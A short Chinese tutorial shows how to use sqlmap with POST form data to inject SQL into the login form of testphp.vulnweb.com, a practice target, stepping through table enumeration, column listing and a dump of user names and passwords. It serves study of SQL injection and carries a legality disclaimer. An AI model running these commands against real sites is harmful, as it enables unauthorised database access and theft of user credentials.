本文仅作为技术文档记录,学习使用,请合法合规,严格遵守《中华人民共和国网络安全法》。一切未经授权的渗透测试行为都是违法违规的。
靶场地址:http://testphp.vulnweb.com/login.php
post请求sqlmap语句
python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --tables
python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --columns -T users
python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --dump -C "name,pass" -T users
与get请求相比的话 就是多了一个--data "表单数据"
依旧是 --tables 猜数据库
columns -T users 猜表
dump -C "name,pass"-T users 猜解数据
抓取登录数据包表单数据:uname=test&pass=test
所以我们的注入语句应该是:python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --tables
现在要对users进行操作 所以接下来的语句是
python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --columns -T users
接下来拆解 name和pass
python .\sqlmap.py -u "http://testphp.vulnweb.com/userinfo.php" --data "uname=test&pass=test" --dump -C "name,pass" -T users